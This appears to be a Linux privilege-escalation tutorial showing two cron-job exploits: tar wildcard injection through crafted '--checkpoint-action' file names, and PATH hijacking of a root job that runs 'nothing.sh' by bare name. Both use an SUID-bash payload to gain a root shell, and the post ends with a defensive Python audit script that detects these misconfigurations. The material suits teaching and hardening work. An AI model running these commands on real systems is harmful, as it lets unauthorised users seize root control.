In Unix, a wildcard character can be used to represent one or more other characters. One example is the * character. The * character can represent zero or multiple characters in a string.
Bash does not support regular expressions like other programming languages and instead uses something called “globbing” to match specific patterns. So instead of using regular expressions to run a command with some given pattern, bash will use wildcard characters to match file names and content.
Let me better illustrate this with an example:
When we run this command, we get a list of all files and directories in the current directory:
Let’s create an arbitrary file called “-la” that is actually a command we want run:
Note: this only works if you specify the entire file path.
When we run ls * to list all the files again, the “-la” file will actually be interpreted as an argument. So now the files will be listed in long format along with any hidden file names:
Now that we understand the concept a little better, let’s try exploiting a cron job that’s running a script with a wildcard argument in it to elevate our privileges:
We first take a look at the /etc/crontab file and notice there is a script being run called /home/admin/scripts/backup.sh as root.
* * * * * root /home/admin/scripts/backup.sh
If we view the script, we will notice there is a wildcard being used as an argument in the script:
To exploit this, we will run these commands in order:
# creating a program that copies /bin/bash over to /tmp and adds the SUID bit on it
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/files/pwn.sh
# creates a file '--checkpoint=1' that will be interpreted as an argument
touch /home/user/files/--checkpoint=1
# creates a file '--checkpoint-action=exec=sh\ pwn.sh' that will be interpreted as an argument
touch /home/user/files/--checkpoint-action=exec=sh\ pwn.sh
We wait for the cron job to run which will take less than a minute.
We now run /tmp/bash -p and should be running as root.
The $PATH variable is an environment variable that specifies where executable programs are located. If you type in $PATH on a Unix machine, it will output the directories where various executables are stored:
root@kali:~# $PATH
bash: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin: No such file or directory
When you type in a program to run, such as python, the system will read the $PATH variable directories from left to right to locate the executable. In this case, python is stored in /usr/bin/python so the $PATH variable was able to provide a directory that contained the executable. If the directory /usr/bin wasn’t in the $PATH variable, then the system wouldn’t know where to find the executable, and the user would need to specify the entire path in the shell to call the program.
Let’s go over an example of how to identify and exploit a misconfigured system crontab.
First, we list out the contents of the /etc/crontab file and make note of two things: the $PATH variable that is set for the cron jobs, and any cron jobs running that may be of interest.
# path variable
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# cron job running a script called nothing.sh every minute as root
* * * * * root nothing.sh
Notice how the $PATH variable has the /home/user directory listed before any other directory. This means the system will search that directory to run nothing.sh before any of the other directories. The system needs to search the $PATH variable for the location of the script because the full file path for nothing.sh was not specified in the cron job.
We will now run the following commands in order to exploit the misconfigured cron job:
# creating a program called nothing.sh that copies /bin/bash over to /tmp and adds the SUID bit on it
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/nothing.sh
# change the permissions of the file so it’s executable
chmod +x /home/user/nothing.sh
# wait 1 minute for the cron job to run
# executes the modified version of bash we created with the SUID bit
/tmp/bash -p
If all went well, we should now be root!
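To close with the defender’s side of both techniques above (the script that hands a wildcard to tar, and the cron job that resolves nothing.sh through a user-writable PATH), here is an added audit script that is not part of the original post. The crontab text and backup script it reads are constructed samples, and the `risky` predicate is an assumption that lets the directory-writability check be stubbed for offline runs.

```python
import os
import re
import shlex
import stat

# Constructed sample input (not from the post's system): the crontab reproduces
# both misconfigurations, and BACKUP_SH is a hypothetical script passing a glob to tar.
SAMPLE_CRONTAB = """\
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root nothing.sh
* * * * * root /home/admin/scripts/backup.sh
"""
BACKUP_SH = """\
#!/bin/bash
cd /home/user/files
tar czf /tmp/backup.tgz *
"""

# Commands that parse options, so a file named '--something' expands into a flag.
WILDCARD_CMD = re.compile(r"^\s*(tar|rsync|chown|chmod|rm|cp|mv)\b.*\*")

def dir_is_risky(path):
    """A PATH entry is risky if it is missing (cannot be verified),
    not owned by root, or group/world writable."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return True
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(text, risky=dir_is_risky):
    """Flag PATH entries a non-root user can write and jobs that name a
    program without a slash, so cron resolves it through PATH."""
    findings, path_dirs = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("PATH="):
            path_dirs = line[len("PATH="):].split(":")
            continue
        fields = line.split(None, 6)  # five time fields, user, command
        if len(fields) != 7:
            continue
        user, prog = fields[5], shlex.split(fields[6])[0]
        if "/" not in prog:
            findings.append(f"{user} job runs '{prog}' by bare name (PATH lookup)")
    findings += [f"writable PATH entry {d}" for d in path_dirs if risky(d)]
    return findings

def audit_script(text):
    """Flag lines that pass a bare glob to an option-parsing command.
    Fix: put '--' before the glob, or build the file list with find -print0."""
    return [ln for ln in text.splitlines() if WILDCARD_CMD.search(ln) and " -- " not in ln]
```

Run `audit_crontab(open("/etc/crontab").read())` on a real host to use the stat-based check instead of the stub.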